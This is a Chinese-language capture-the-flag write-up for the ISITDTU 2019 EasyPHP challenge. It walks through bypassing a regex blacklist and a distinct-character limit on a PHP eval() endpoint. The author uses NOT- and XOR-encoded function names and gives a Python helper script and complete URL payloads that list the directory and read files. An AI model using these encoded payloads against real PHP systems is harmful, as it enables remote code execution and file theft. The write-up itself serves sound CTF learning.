<?php highlight_file(__FILE__);$_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )die('rosé will not do it');if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )die('you are so close, omg');eval($_); ?>

審計代碼得知，我們需要滿足兩個if語句，先看第一個if語句：

$_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) )die('rosé will not do it');

我們要get傳入_，并且php會對_進行正則匹配，過濾的內容很多，\x00(NULL)-\x20(Space)、數字0-9、字符`、"、$&等，有點像無字符數字rce，可以取反繞過，再看第二個if

if ( strlen(count_chars(strtolower($_), 0x3)) > 0xd )die('you are so close, omg');

strtolower()函數：PHP strtolower() 函數 | 菜鳥教程，就是將傳入的_轉換為小寫，count_chars()函數：PHP count_chars() 函數 | 菜鳥教程，count_chars（string，mode）根據mode的值檢查string中出現的字符串，在本題中mode=3，字符串，帶有所有使用過的不同的字符，例如：

而strlen()函數則是返回字符串的長度，在本題中檢查字符串的長度是否大于十三，如果字符串長度大于十三就die了。先使用取反來查看phpinfo()：

<?php print(urlencode(~'phpinfo')); ?>

輸出結果為%8F%97%8F%96%91%99%90，get傳值試一下

沒有回顯，換一種取反方式異或%FF，payload：/?_=((%8F%97%8F%96%91%99%90)^(%FF%FF%FF%FF%FF%FF%FF))();

成功回顯，查看一下禁用函數?

禁用了很多的函數，但是我們仍可以用scandir()、var_dump()、readfile()、print_r()等來查看目錄，并讀取flag，先print_r(scandir(.))輸出當前目錄下的內容

<?php echo(urlencode(~'print_r')); echo nl2br("\n"); echo(urlencode(~'scandir')); echo nl2br("\n"); echo(urlencode(~'.')); ?>

輸出結果為：%8F%8D%96%91%8B%A0%8D %8C%9C%9E%91%9B%96%8D %D1，構造payload：/?_=(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%D1)^(%FF)));

有回顯，但是被第二層if給攔截了，一定是我們的payload沒有通過strlen(count_chars(strtolower($_), 0x3))的檢查，測試一下

<?php print(strlen(count_chars(strtolower('(%8F%8D%96%91%8B%A0%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%8C%9C%9E%91%9B%96%8D)^(%FF%FF%FF%FF%FF%FF%FF)((%D1)^(%FF)));'), 0x3))); ?>

測試長度為16確實超出了規定范圍，這個時候我們可以使用異或的方法通過已存在的字符構造出來字符來代替三個其中的字符，這樣長度就從16縮到了13，選擇使用pscadi來代替ntr，python腳本

str = 'pscadi' target = 'ntr'for m in target:for a in str:for b in str:for c in str:if ord(a) ^ ord(b) ^ ord(c) == ord(m):print("{} = {}^{}^{}".format(m, a, b, c))

運行出來很多結果，我們各取第一個即：n = c^d^i、t = s^c^d、r = p^c^a，替換后的

print_r:(%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)

scandir:(%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF)

先檢驗一下，腳本：

<?php print(urldecode('%8F%9E%96%9C%9C%A0%9E')^urldecode('%FF%9C%FF%9B%9B%FF%9C')^urldecode('%FF%8F%FF%96%8C%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF')); print("\n"); print(urldecode('%8C%9C%9E%9C%9B%96%9E')^urldecode('%FF%FF%FF%9B%FF%FF%9C')^urldecode('%FF%FF%FF%96%FF%FF%8F')^urldecode('%FF%FF%FF%FF%FF%FF%FF')); ?>

測試結果是正確的，直接就可以構造新的payload：/?_=((%8F%9E%96%9C%9C%A0%9E)^(%FF%9C%FF%9B%9B%FF%9C)^(%FF%8F%FF%96%8C%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))(((%8C%9C%9E%9C%9B%96%9E)^(%FF%FF%FF%9B%FF%FF%9C)^(%FF%FF%FF%96%FF%FF%8F)^(%FF%FF%FF%FF%FF%FF%FF))((%D1)^(%FF)));

回顯成功，flag應該在n0t_a_flAg_FiLe_dONT_rE4D_7hIs.txt內，可以看到文件名太長了，而且還在數組的最后一位，很有可能會報錯，直接readfile(end(scandir(.)))，構造payload：/?_=((%8D%8D%8D%8D%8D%8D%9E%8D)^(%9A%8D%8D%8D%8D%8D%9B%8D)^(%9A%9A%9E%9B%99%96%96%9A)^(%FF%FF%FF%FF%FF%FF%FF%FF))(((%8D%9E%8D)^(%8D%99%8D)^(%9A%96%9B)^(%FF%FF%FF))(((%8D%9E%8D%9E%8D%8D%8D)^(%9A%9B%8D%99%8D%8D%9A)^(%9B%99%9E%96%9B%96%9A)^(%FF%FF%FF%FF%FF%FF%FF))(%D1^%FF)));

測試一下：

<?php echo(urldecode('%8D%8D%8D%8D%8D%8D%9E%8D')^urldecode('%9A%8D%8D%8D%8D%8D%9B%8D')^urldecode('%9A%9A%9E%9B%99%96%96%9A')^urldecode('%FF%FF%FF%FF%FF%FF%FF%FF')); echo nl2br("\n"); echo(urldecode('%8D%9E%8D')^urldecode('%8D%99%8D')^urldecode('%9A%96%9B')^urldecode('%FF%FF%FF')); echo nl2br("\n"); echo(urldecode('%8D%9E%8D%9E%8D%8D%8D')^urldecode('%9A%9B%8D%99%8D%8D%9A')^urldecode('%9B%99%9E%96%9B%96%9A')^urldecode('%FF%FF%FF%FF%FF%FF%FF')); echo nl2br("\n"); echo(urldecode('%D1')^urldecode('%FF')); ?>

測試正確，get傳值就可以了?

總結

以上是生活随笔為你收集整理的[ISITDTU 2019]EasyPHP的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。